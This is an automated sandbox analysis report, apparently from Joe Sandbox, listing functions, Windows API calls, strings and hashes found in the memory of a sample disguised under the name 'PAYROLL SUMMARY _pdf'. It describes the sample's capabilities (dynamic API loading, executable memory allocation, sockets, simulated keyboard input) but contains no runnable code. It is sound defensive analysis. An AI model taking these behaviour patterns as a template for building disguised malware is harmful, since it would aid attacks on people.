Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b616d507edddbf3a33ca5a4975136d073dffef440810c2058f4d4f272334f3d2
Instruction ID: e5a6339b23acb31ae36dab158c7d6a821f0f29ae31f7aeaa4a1ce6f8e1c3a523
Opcode Fuzzy Hash: b616d507edddbf3a33ca5a4975136d073dffef440810c2058f4d4f272334f3d2
Instruction Fuzzy Hash: 7A112732264209BADF109F60CC05FDB37ADEF89764F02451AFA01A61D0D271DC21CB60

Function 00254C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254C2E), ref: 00254CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00254CB5

Strings

GetNativeSystemInfo, xrefs: 00254CAF
kernel32.dll, xrefs: 00254C9E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
Instruction ID: 2ee4209af399822c015a5d854bc7cd717774dc062b86daa315b75e00fffa2a56
Opcode Fuzzy Hash: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
Instruction Fuzzy Hash: 2BD01230921723CFD7605F31DB18606B6D5AF06756B15883B9C97D6650D770DCD0C658

Function 00254D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254D2E,?,00254F4F,?,003162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00254D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00254D7B
kernel32.dll, xrefs: 00254D6A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 586d989d6cc1fc741ef4926a5c21b60a329162a2ca25512e18d16989ba549957
Instruction ID: 39228f47d8b9ec3596a235b8e44bd174e84ddf3243661b9797a3a7826ad2c303
Opcode Fuzzy Hash: 586d989d6cc1fc741ef4926a5c21b60a329162a2ca25512e18d16989ba549957
Instruction Fuzzy Hash: A5D0C731922313CFC720AF30E908202B2E8AF05766B10883BD88BC2290E774D8C0CA68

Function 00254D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254CE1,?), ref: 00254DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00254DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00254DAE
kernel32.dll, xrefs: 00254D9D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: d50797bcb6c91f42da183a57c043a7cc80574cfdc5d750f66c912360350770a3
Instruction ID: 10cb3c8f56b282f75e20a4f52a625036b1a87e22e0ed4110817a81866ae26af2
Opcode Fuzzy Hash: d50797bcb6c91f42da183a57c043a7cc80574cfdc5d750f66c912360350770a3
Instruction Fuzzy Hash: 4BD01231961713CFD7205F31D908646B6E4AF05359B15883BDCD6D6150D774D8D0CA54

Function 002D1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,002D12C1), ref: 002D1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D1092

Strings

RegDeleteKeyExW, xrefs: 002D108C
advapi32.dll, xrefs: 002D107B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 726b09d7f390d0bb3235ce307c114a38b155284289e925c833847aa3fc5d9663
Instruction ID: 5a31520cf7ee21297b47b76ab0bcde5ce1a888d51c2230a67e2d9c7148d07cc6
Opcode Fuzzy Hash: 726b09d7f390d0bb3235ce307c114a38b155284289e925c833847aa3fc5d9663
Instruction Fuzzy Hash: FFD0C230811313DFC3205F30D828556B2E8AF14352B048C3BE8CAC6690D770CCD0C610

Function 002C93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C9009,?,002DF910), ref: 002C9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C9415

Strings

GetModuleHandleExW, xrefs: 002C940F
kernel32.dll, xrefs: 002C93FE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 1d4b30b7b125c965ba93e4b745fb6199a7f6102a09b9be8bc70bf6cc54f2e130
Instruction ID: 06ac6ee79cf7c4610b92d9aa56ed938e56147386ab3613a241e293ee26904d28
Opcode Fuzzy Hash: 1d4b30b7b125c965ba93e4b745fb6199a7f6102a09b9be8bc70bf6cc54f2e130
Instruction Fuzzy Hash: B7D0E234925713CFD7209F31EA0CA4676E5AF05351B15C83EA89AE6690E670C8D08A60

Function 00291B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00291B42
__swprintf.LIBCMT ref: 00291B73

Strings

%.3d, xrefs: 00291B4D
WIN_XPe, xrefs: 00291BB2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 66f6d877283f3ef49be724ce11c3a028ebe550155181d1b8619d5c2229252ce4
Instruction ID: 92d830ae9a553943f370321f2a27abe2522214a4764b91ce08b677d27945663b
Opcode Fuzzy Hash: 66f6d877283f3ef49be724ce11c3a028ebe550155181d1b8619d5c2229252ce4
Instruction Fuzzy Hash: 17D0C271C3420AEACF049A92DC648F9737DAB08305F100192F80291040F2B08BB4AB25

Function 002A76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
Instruction ID: f18274e11e59b3812b8df86ec01f55baafff0f06d6ce52255c3b270009347955
Opcode Fuzzy Hash: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
Instruction Fuzzy Hash: F6C18B75A14216EFDB14CF94CC84EAEB7B9FF49310B108599E806EB251DB30EE91CB94

Function 002CE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 002CE3D2
CharLowerBuffW.USER32(?,?), ref: 002CE415

Part of subcall function 002CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE615
_memmove.LIBCMT ref: 002CE628

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 6bbeeb22f80863d163a24b8df3207240489e10d9754012006c3e2d1ccf183e10
Instruction ID: f7c982802d7d723a21065fb6c6e0f7c8045da0bdd15cc228485939aa4d906837
Opcode Fuzzy Hash: 6bbeeb22f80863d163a24b8df3207240489e10d9754012006c3e2d1ccf183e10
Instruction Fuzzy Hash: 52C15A716283019FCB14DF28C480A6ABBE4FF88318F158A6DF8999B351D731E955CF82

Function 002C83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002C83D8
CoUninitialize.OLE32 ref: 002C83E3

Part of subcall function 002ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002ADAC5

VariantInit.OLEAUT32(?), ref: 002C83EE
VariantClear.OLEAUT32(?), ref: 002C86BF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: de6ffd469f2d4f36cb14793a8e8686412d29e7f041e8c8ecc1d24a91aca6a8c3
Instruction ID: 74d3c827a0e325a507fe8288cd6dde25891d554799ec6fc338bceab307b693ab
Opcode Fuzzy Hash: de6ffd469f2d4f36cb14793a8e8686412d29e7f041e8c8ecc1d24a91aca6a8c3
Instruction Fuzzy Hash: 11A114752247029FCB10DF14C485B2AB7E4BF88354F18854DF99A9B3A1CB70ED64CB96

Function 002A6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002A6E04
SysAllocString.OLEAUT32(00000000), ref: 002A6EAD
VariantCopy.OLEAUT32 ref: 002A6EDC
VariantClear.OLEAUT32(?), ref: 002A6F03

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: a1d3368af27eee0d54a038a7f1e77d139a18fe5d8b4e2203a984a714e8fd73c3
Instruction ID: fbb082e1df1d5b1812b0073b1ef98441d3a40282fe4ba199fe10a2fb9f7d8aab
Opcode Fuzzy Hash: a1d3368af27eee0d54a038a7f1e77d139a18fe5d8b4e2203a984a714e8fd73c3
Instruction Fuzzy Hash: 2051E930634302DFDB30AF65D895B2AB3E4AF4A310F24881FE556CB691DF7098A49F09

Function 002D9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0194C4F8,?), ref: 002D9AD2
ScreenToClient.USER32(00000002,00000002), ref: 002D9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 002D9B72

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5d3e86f40f8097ab040152313fd78d2255c161061f25a6c39b0d3f2a65f78efd
Instruction ID: 10ebdb62bcb2ac6b5671e9b3a796456c26c0481f589b1eee714fa18157814dac
Opcode Fuzzy Hash: 5d3e86f40f8097ab040152313fd78d2255c161061f25a6c39b0d3f2a65f78efd
Instruction Fuzzy Hash: 63514D35A10209EFCF10DF58E881AAE7BB9FB44324F11815BF8159B390D730AD91CB90

Function 002C6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 002C6CE4
WSAGetLastError.WSOCK32(00000000), ref: 002C6CF4

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C6D58
WSAGetLastError.WSOCK32(00000000), ref: 002C6D64

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 946d3885ea9cf1ad2c21e23dadf2097f56ed14686673cde44408dbc98de725d7
Instruction ID: ba767c4886474f82afdc9b3ea26515b57431ea99de4558cc7e4c5e640dde27f2
Opcode Fuzzy Hash: 946d3885ea9cf1ad2c21e23dadf2097f56ed14686673cde44408dbc98de725d7
Instruction Fuzzy Hash: 9D41D434750200AFEB10AF24DC8BF3A77E59B04B10F54811CFE1AAB2C2DBB19D508B95

Function 002C672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002DF910), ref: 002C67BA
_strlen.LIBCMT ref: 002C67EC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e32df80ddcf36168c52b27a2dc74cfd08f07df06695fa4e4063390812a022cee
Instruction ID: f1daf20024e64862cf9b2f2f926e79f2362db5e3941a45cf96a3c0945c17080b
Opcode Fuzzy Hash: e32df80ddcf36168c52b27a2dc74cfd08f07df06695fa4e4063390812a022cee
Instruction Fuzzy Hash: 8741EB31920104AFCB14EB64DCD5FADB3A8EF44310F148269F91A97292DF30AD68CF55

Function 002BBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002BBB09
GetLastError.KERNEL32(?,00000000), ref: 002BBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002BBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002BBB80

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9f4bba0b4ea41bcc6c2d3fccb36fe415f2d528cb9cf277e8edca2dd0956f5ebf
Instruction ID: 0ec16685e338039c65ddda209822e569374083692f4d37194f5b20e1152dab88
Opcode Fuzzy Hash: 9f4bba0b4ea41bcc6c2d3fccb36fe415f2d528cb9cf277e8edca2dd0956f5ebf
Instruction Fuzzy Hash: 5D414339610611DFCB11EF14C588A5DBBE1AF89321B198089EC8A9B362CB70FD64CF95

Function 002D8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D8B4D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 539d9314d01557f564f6ae45bca0c7ebedc526ebc36dd0e711e31810789e07a2
Instruction ID: b6bd1893729b23f10f99f5f49e4018dafc729d8fe45e8590e779da51be207f5a
Opcode Fuzzy Hash: 539d9314d01557f564f6ae45bca0c7ebedc526ebc36dd0e711e31810789e07a2
Instruction Fuzzy Hash: E431E4B4620205BFEF219F58DC45FA937A8EB09318F648917FA52D63E0DE70AD60CB51

Function 002DADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 002DAE1A
GetWindowRect.USER32(?,?), ref: 002DAE90
PtInRect.USER32(?,?,002DC304), ref: 002DAEA0
MessageBeep.USER32(00000000), ref: 002DAF11

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: a5f0921905b78b0853d302972c6427d379e6316795e03a9c85b28c76315765c7
Instruction ID: 4cce45f98ca9a099007957e2f33b8dcffed7f08a775192679e78a407036ceee3
Opcode Fuzzy Hash: a5f0921905b78b0853d302972c6427d379e6316795e03a9c85b28c76315765c7
Instruction Fuzzy Hash: 46416A70A1111A9FCB11CF58D885FA97BF5FB88340F1481BAE8159B351D731ED11DB92

Function 002B0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 002B1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B110B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
Instruction ID: 1a46d080ab61bf78773b2f55160b11786049df5ce925da510093052cde7a24c6
Opcode Fuzzy Hash: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
Instruction Fuzzy Hash: 8F319C30E70689AEFF309F298C197FABBA9AF44390F84462AEC91421D0C3748DF49751

Function 002B1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 002B1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 002B1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 002B11F1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 002B1243

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
